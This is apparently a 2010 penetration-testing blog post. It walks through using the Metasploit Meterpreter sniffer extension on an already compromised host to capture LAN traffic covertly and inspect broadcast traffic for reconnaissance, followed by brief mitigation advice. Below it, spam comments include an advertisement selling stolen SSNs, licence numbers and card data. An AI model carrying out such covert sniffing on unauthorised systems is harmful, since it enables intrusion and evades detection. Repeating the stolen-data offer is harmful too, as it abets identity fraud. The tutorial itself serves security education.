Saturday 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foot-hold by compromising and initial host, one of the first things he needs do is some basic host and network reconnaissance in order to see "where he is" and "what he can do next".

One of the techniques that could be used, is passive network reconnaissance, i.e. packet-sniffing to "listen" to the victims LAN for interesting traffic. Here we explore how to use a sniffer such as the Metasploit Meterpreter sniffer extension.

Please remember to use these techinques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN  traffic can be very useful to an external attacker, to assist in information gathering and compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a network packet sniffer such as wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile so installing an application where it does not exist previously is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed, no files are written to disk; everything is stored in memory, and all communications between the attacker and victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help

<......>

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself) and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check progress of the collection by issuing a sniffer stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
/root
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, so see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap


Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network capture files, we can examine them locally at our leisure on the attacker system. This can be done with a nice graphical tool like Wireshark, to filter the traffic and see what we could learn about the remote victim network.

Here we filter Netbios/SMB broadcast traffic to see what systems we can see on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN)



Other filters could be applied to other broadcast traffic such as; address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services, such as file and print.

Using these methods, we can gather a list of live IP addresses, address ranges, and machine types, and all this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.

Mitigation

Once a single system is compromised, it is only a matter of a short amount of time before an attacker can gather enough local information to "pivot" his attack and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts, and test systems, as these could also be used as bridgehead to silently sniff, or attack other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalls and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.
Posted by at

5 comments:

  1. Rigid Box30 January 2019 at 09:25

    Information from this blog is very useful for me, am very happy to read this blog Kindly visit us @ Luxury Watch Box | Shoe Box Manufacturer | Luxury Cosmetics Box

    ReplyDelete
  2. No Name10 July 2020 at 21:00

    Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  3. yanmaneee11 June 2021 at 19:28

    golden goose starter
    moncler outlet
    yeezy
    hermes belts
    off white shoes
    jordan shoes
    jordan shoes
    golden goose
    kd13
    curry shoes

    ReplyDelete
  4. Anonymous30 July 2022 at 09:11

    replica bags reddit hermes fake a8i03f9i43 replica bags india this w4g42v9h77 Ysl replica handbags replica bags gucci her response r4s23y9i92 high quality designer replica replica bags online uae

    ReplyDelete
  5. Anonymous17 January 2024 at 09:46

    a bathing ape
    travis scott jordan
    curry shoes
    off white
    golden goose shoes cheap
    off white outlet
    off white outlet
    supreme shirt
    fear of god outlet
    golden goose outlet

    ReplyDelete

Subscribe to: Post Comments (Atom)